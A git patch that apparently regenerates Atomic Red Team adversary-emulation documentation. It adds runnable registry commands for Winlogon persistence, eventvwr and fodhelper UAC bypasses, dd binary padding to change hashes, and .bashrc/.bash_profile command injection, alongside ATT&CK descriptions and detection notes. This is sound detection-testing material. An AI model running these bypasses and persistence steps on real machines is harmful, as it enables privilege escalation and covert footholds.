From 07079c9ed7732d04d80df0cc724677248ab8a2cd Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 13 Dec 2018 16:06:36 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1004/T1004.md | 76 +++++++++ atomics/T1009/T1009.md | 19 ++- atomics/T1088/T1088.md | 67 ++++++++ atomics/T1156/T1156.md | 31 +++- atomics/index.md | 16 +- atomics/index.yaml | 346 ++++++++++++++++++++++++++++++++------ atomics/linux-index.md | 5 +- atomics/macos-index.md | 5 +- atomics/matrix.md | 2 +- atomics/windows-index.md | 11 +- atomics/windows-matrix.md | 2 +- 11 files changed, 502 insertions(+), 78 deletions(-) create mode 100644 atomics/T1004/T1004.md diff --git a/atomics/T1004/T1004.md b/atomics/T1004/T1004.md new file mode 100644 index 00000000..01b4d876 --- /dev/null +++ b/atomics/T1004/T1004.md @@ -0,0 +1,76 @@ +# T1004 - Winlogon Helper DLL +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004) +
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) + +Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013) + +* Winlogon\Notify - points to notification package DLLs that handle Winlogon events +* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on +* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on + +Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.
+ +## Atomic Tests + +- [Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell](#atomic-test-1---winlogon-shell-key-persistence---powershell) + +- [Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell](#atomic-test-2---winlogon-userinit-key-persistence---powershell) + +- [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell) + + +
+ +## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell +PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| + +#### Run it with `powershell`! +``` +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force +``` +
+
+ +## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell +PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| + +#### Run it with `powershell`! +``` +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force +``` +
+
+ +## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell +PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll| + +#### Run it with `powershell`! +``` +New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force +Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force +``` +
diff --git a/atomics/T1009/T1009.md b/atomics/T1009/T1009.md index 240c2a60..7e5293c5 100644 --- a/atomics/T1009/T1009.md +++ b/atomics/T1009/T1009.md @@ -4,23 +4,26 @@ ## Atomic Tests -- [Atomic Test #1 - Pad Evil Binary to Change Hash](#atomic-test-1---pad-evil-binary-to-change-hash) +- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
-## Atomic Test #1 - Pad Evil Binary to Change Hash -Copies cat to create an "evil binary" and pads it with a zero to change the hash without harming execution +## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd +Uses dd to add a zero to the binary to change the hash **Supported Platforms:** macOS, Linux +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| binary_to_pad | Path of binary to be padded | Path | /tmp/EvilBinary| + #### Run it with `sh`! ``` -cp /bin/cat /tmp/evilCat -md5sum /tmp/evilCat -dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat -md5sum /tmp/evilCat -/tmp/evilCat .bash_profile +md5sum #{binary_to_pad} +dd if=/dev/zero bs=1 count=1 >> #{binary_to_pad} +md5sum #{binary_to_pad} ```
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md index f97b1f64..c9351291 100644 --- a/atomics/T1088/T1088.md +++ b/atomics/T1088/T1088.md @@ -14,6 +14,12 @@ Another bypass is possible through some Lateral Movement techniques if credentia - [Atomic Test #1 - Bypass UAC using Event Viewer](#atomic-test-1---bypass-uac-using-event-viewer) +- [Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell](#atomic-test-2---bypass-uac-using-event-viewer---powershell) + +- [Atomic Test #3 - Bypass UAC using Fodhelper](#atomic-test-3---bypass-uac-using-fodhelper) + +- [Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell](#atomic-test-4---bypass-uac-using-fodhelper---powershell) +
@@ -34,3 +40,64 @@ reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executabl cmd.exe -c eventvwr.msc ```
+
+ +## Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell +PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| + +#### Run it with `command_prompt`! +``` +New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force +Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force +Start-Process "C:\Windows\System32\eventvwr.msc" +``` +
+
+ +## Atomic Test #3 - Bypass UAC using Fodhelper +Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| + +#### Run it with `command_prompt`! +``` +reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f +reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" +fodhelper.exe +``` +
+
+ +## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell +PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| + +#### Run it with `powershell`! +``` +New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force +New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force +Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force +Start-Process "C:\Windows\System32\fodhelper.exe" +``` +
diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md index 90600a1f..1d81f042 100644 --- a/atomics/T1156/T1156.md +++ b/atomics/T1156/T1156.md @@ -8,13 +8,15 @@ These files are meant to be written to by the local user to configure their own ## Atomic Tests -- [Atomic Test #1 - .bash_profile and .bashrc](#atomic-test-1---bash_profile-and-bashrc) +- [Atomic Test #1 - Add command to .bash_profile](#atomic-test-1---add-command-to-bash_profile) + +- [Atomic Test #2 - Add command to .bashrc](#atomic-test-2---add-command-to-bashrc)
-## Atomic Test #1 - .bash_profile and .bashrc -xxx +## Atomic Test #1 - Add command to .bash_profile +Adds a command to the .bash_profile file of the current user **Supported Platforms:** macOS, Linux @@ -22,11 +24,28 @@ xxx #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| script | path to script | path | /path/to/script.py| +| command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py| #### Run it with `sh`! ``` -echo "#{script}" >> ~/.bash_profile -echo "#{script}" >> ~/.bashrc +echo "#{command_to_add}" >> ~/.bash_profile +``` +
+
+ +## Atomic Test #2 - Add command to .bashrc +Adds a command to the .bashrc file of the current user + +**Supported Platforms:** macOS, Linux + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| command_to_add | Command to add to the .bashrc file | string | /path/to/script.py| + +#### Run it with `sh`! +``` +echo "#{command_to_add}" >> ~/.bashrc ```
diff --git a/atomics/index.md b/atomics/index.md index 93865285..11b6b8af 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -1,7 +1,8 @@ # All Atomic Tests by ATT&CK Tactic & Technique # persistence - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - - Atomic Test #1: .bash_profile and .bashrc [macos, linux] + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] - [T1015 Accessibility Features](./T1015/T1015.md) - Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows] - Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows] @@ -126,7 +127,10 @@ - [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md) - Atomic Test #1: Persistence [windows] - Atomic Test #2: Persistence Cleanup [windows] -- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1004 Winlogon Helper DLL](./T1004/T1004.md) + - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] + - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows] + - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] # defense-evasion - [T1134 Access Token Manipulation](./T1134/T1134.md) @@ -136,9 +140,12 @@ - Atomic Test #2: Download & Execute via PowerShell BITS [windows] - Atomic Test #3: Persist, Download, & Execute [windows] - [T1009 Binary Padding](./T1009/T1009.md) - - Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - [T1088 Bypass User Account Control](./T1088/T1088.md) - Atomic Test #1: Bypass UAC using Event Viewer [windows] + - Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - [T1191 CMSTP](./T1191/T1191.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] @@ -330,6 +337,9 @@ - Atomic Test #1: Application Shim Installation [windows] - [T1088 Bypass User Account Control](./T1088/T1088.md) - Atomic Test #1: Bypass UAC using Event Viewer [windows] + - Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] - T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/index.yaml b/atomics/index.yaml index 183f17bc..b1f617e8 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -46,23 +46,40 @@ persistence: created: '2017-12-14T16:46:06.044Z' identifier: T1156 atomic_tests: - - name: ".bash_profile and .bashrc" - description: 'xxx + - name: Add command to .bash_profile + description: 'Adds a command to the .bash_profile file of the current user ' supported_platforms: - macos - linux input_arguments: - script: - description: path to script - type: path + command_to_add: + description: Command to add to the .bash_profile file + type: string default: "/path/to/script.py" executor: name: sh - command: | - echo "#{script}" >> ~/.bash_profile - echo "#{script}" >> ~/.bashrc + command: 'echo "#{command_to_add}" >> ~/.bash_profile + +' + - name: Add command to .bashrc + description: 'Adds a command to the .bashrc file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bashrc file + type: string + default: "/path/to/script.py" + executor: + name: sh + command: 'echo "#{command_to_add}" >> ~/.bashrc + +' T1015: technique: id: attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3 @@ -347,63 +364,58 @@ persistence: } '': technique: - id: attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79 + id: attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Winlogon Helper DLL - description: "Winlogon.exe is a Windows component responsible for actions at - logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - Registry entries in HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows - NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper - programs and functionalities that support Winlogon. (Citation: Cylance Reg - Persistence Sept 2013) \n\nMalicious modifications to these Registry keys - may cause Winlogon to load and execute malicious DLLs and/or executables. - Specifically, the following subkeys have been known to be possibly vulnerable - to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify - - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit - - points to userinit.exe, the user initialization program executed when a - user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell - executed when a user logs on\n\nAdversaries may take advantage of these features - to repeatedly execute malicious code and establish Persistence." + name: Web Shell + description: |- + A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013) + + Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed. external_references: - - external_id: T1004 - url: https://attack.mitre.org/techniques/T1004 + - external_id: T1100 + url: https://attack.mitre.org/techniques/T1100 source_name: mitre-attack - - external_id: CAPEC-579 - url: https://capec.mitre.org/data/definitions/579.html - source_name: capec - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order - description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, - Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' - source_name: Cylance Reg Persistence Sept 2013 + - url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html + description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down + the China Chopper Web Shell - Part I. Retrieved March 27, 2015. + source_name: Lee 2013 + - url: https://www.us-cert.gov/ncas/alerts/TA15-314A + description: US-CERT. (2015, November 13). Compromised Web Servers and Web + Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. + source_name: US-CERT Alert TA15-314A Web Shells object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 x_mitre_version: '1.0' - x_mitre_contributors: - - Praetorian x_mitre_data_sources: - - Windows Registry + - Anti-virus + - Authentication logs - File monitoring + - Netflow/Enclave netflow - Process monitoring x_mitre_detection: |- - Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. + Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) - Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_permissions_required: - - Administrator + + + Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) + x_mitre_effective_permissions: - SYSTEM + - User x_mitre_platforms: + - Linux - Windows + - macOS + x_mitre_system_requirements: + - Adversary access to Web server with vulnerability or account to upload and + serve the Web shell file. type: attack-pattern kill_chain_phases: - phase_name: persistence kill_chain_name: mitre-attack + - phase_name: privilege-escalation + kill_chain_name: mitre-attack modified: '2018-10-17T00:14:20.652Z' - created: '2017-05-31T21:30:20.148Z' + created: '2017-05-31T21:31:13.061Z' atomic_tests: [] T1103: technique: @@ -3565,6 +3577,120 @@ persistence: $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject + T1004: + technique: + id: attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Winlogon Helper DLL + description: "Winlogon.exe is a Windows component responsible for actions at + logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. + Registry entries in HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows + NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper + programs and functionalities that support Winlogon. (Citation: Cylance Reg + Persistence Sept 2013) \n\nMalicious modifications to these Registry keys + may cause Winlogon to load and execute malicious DLLs and/or executables. + Specifically, the following subkeys have been known to be possibly vulnerable + to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify + - points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit + - points to userinit.exe, the user initialization program executed when a + user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell + executed when a user logs on\n\nAdversaries may take advantage of these features + to repeatedly execute malicious code and establish Persistence." + external_references: + - external_id: T1004 + url: https://attack.mitre.org/techniques/T1004 + source_name: mitre-attack + - external_id: CAPEC-579 + url: https://capec.mitre.org/data/definitions/579.html + source_name: capec + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence, + Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.' + source_name: Cylance Reg Persistence Sept 2013 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_version: '1.0' + x_mitre_contributors: + - Praetorian + x_mitre_data_sources: + - Windows Registry + - File monitoring + - Process monitoring + x_mitre_detection: |- + Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious. + + Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_platforms: + - Windows + type: attack-pattern + kill_chain_phases: + - phase_name: persistence + kill_chain_name: mitre-attack + modified: '2018-10-17T00:14:20.652Z' + created: '2017-05-31T21:30:20.148Z' + identifier: T1004 + atomic_tests: + - name: Winlogon Shell Key Persistence - PowerShell + description: 'PowerShell code to set Winlogon shell key to execute a binary + at logon along with explorer.exe. + +' + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + name: powershell + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Shell" "explorer.exe, #{binary_to_execute}" -Force + +' + - name: Winlogon Userinit Key Persistence - PowerShell + description: 'PowerShell code to set Winlogon userinit key to execute a binary + at logon along with userinit.exe. + +' + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of binary to execute + type: Path + default: C:\Windows\System32\cmd.exe + executor: + name: powershell + command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" + "Userinit" "Userinit.exe, #{binary_to_execute}" -Force + +' + - name: Winlogon Notify Key Logon Persistence - PowerShell + description: 'PowerShell code to set Winlogon Notify key to execute a notification + package DLL at logon. + +' + supported_platforms: + - windows + input_arguments: + binary_to_execute: + description: Path of notification package to execute + type: Path + default: C:\Windows\Temp\atomicNotificationPackage.dll + executor: + name: powershell + command: | + New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force + Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force defense-evasion: T1134: technique: @@ -3914,22 +4040,24 @@ defense-evasion: created: '2017-05-31T21:30:22.096Z' identifier: T1009 atomic_tests: - - name: Pad Evil Binary to Change Hash - description: 'Copies cat to create an "evil binary" and pads it with a zero - to change the hash without harming execution + - name: Pad Binary to Change Hash - Linux/macOS dd + description: 'Uses dd to add a zero to the binary to change the hash ' supported_platforms: - macos - linux + input_arguments: + binary_to_pad: + description: Path of binary to be padded + type: Path + default: "/tmp/EvilBinary" executor: name: sh command: | - cp /bin/cat /tmp/evilCat - md5sum /tmp/evilCat - dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat - md5sum /tmp/evilCat - /tmp/evilCat .bash_profile + md5sum #{binary_to_pad} + dd if=/dev/zero bs=1 count=1 >> #{binary_to_pad} + md5sum #{binary_to_pad} T1088: technique: id: attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be @@ -4044,6 +4172,61 @@ defense-evasion: command: | reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f cmd.exe -c eventvwr.msc + - name: Bypass UAC using Event Viewer - PowerShell + description: 'PowerShell code to bypass User Account Control using Event Viewer + and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: command_prompt + command: | + New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force + Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\eventvwr.msc" + - name: Bypass UAC using Fodhelper + description: 'Bypasses User Account Control using the Windows 10 Features on + Demand Helper (fodhelper.exe). Requires Windows 10. + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: command_prompt + command: | + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" + fodhelper.exe + - name: Bypass UAC using Fodhelper - PowerShell + description: 'PowerShell code to bypass User Account Control using the Windows + 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: powershell + command: | + New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force + New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force + Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\fodhelper.exe" T1191: technique: id: attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3 @@ -9361,6 +9544,61 @@ privilege-escalation: command: | reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f cmd.exe -c eventvwr.msc + - name: Bypass UAC using Event Viewer - PowerShell + description: 'PowerShell code to bypass User Account Control using Event Viewer + and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: command_prompt + command: | + New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force + Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\eventvwr.msc" + - name: Bypass UAC using Fodhelper + description: 'Bypasses User Account Control using the Windows 10 Features on + Demand Helper (fodhelper.exe). Requires Windows 10. + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: command_prompt + command: | + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f + reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" + fodhelper.exe + - name: Bypass UAC using Fodhelper - PowerShell + description: 'PowerShell code to bypass User Account Control using the Windows + 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. + +' + supported_platforms: + - windows + input_arguments: + executable_binary: + description: Binary to execute with UAC Bypass + type: path + default: C:\Windows\System32\cmd.exe + executor: + name: powershell + command: | + New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force + New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force + Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force + Start-Process "C:\Windows\System32\fodhelper.exe" T1179: technique: id: attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5 diff --git a/atomics/linux-index.md b/atomics/linux-index.md index f52b2c9b..b712ba93 100644 --- a/atomics/linux-index.md +++ b/atomics/linux-index.md @@ -1,7 +1,8 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique # persistence - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - - Atomic Test #1: .bash_profile and .bashrc [macos, linux] + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] - T1067 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1176 Browser Extensions](./T1176/T1176.md) - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] @@ -130,7 +131,7 @@ # defense-evasion - [T1009 Binary Padding](./T1009/T1009.md) - - Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - [T1146 Clear Command History](./T1146/T1146.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - Atomic Test #2: Clear Bash history (echo) [linux, macos] diff --git a/atomics/macos-index.md b/atomics/macos-index.md index 0aa04944..32b1253c 100644 --- a/atomics/macos-index.md +++ b/atomics/macos-index.md @@ -1,7 +1,8 @@ # macOS Atomic Tests by ATT&CK Tactic & Technique # persistence - [T1156 .bash_profile and .bashrc](./T1156/T1156.md) - - Atomic Test #1: .bash_profile and .bashrc [macos, linux] + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] - [T1176 Browser Extensions](./T1176/T1176.md) - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] @@ -190,7 +191,7 @@ # defense-evasion - [T1009 Binary Padding](./T1009/T1009.md) - - Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - [T1146 Clear Command History](./T1146/T1146.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - Atomic Test #2: Clear Bash history (echo) [linux, macos] diff --git a/atomics/matrix.md b/atomics/matrix.md index e2f0f6a7..43fd251f 100644 --- a/atomics/matrix.md +++ b/atomics/matrix.md @@ -58,7 +58,7 @@ | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | | | 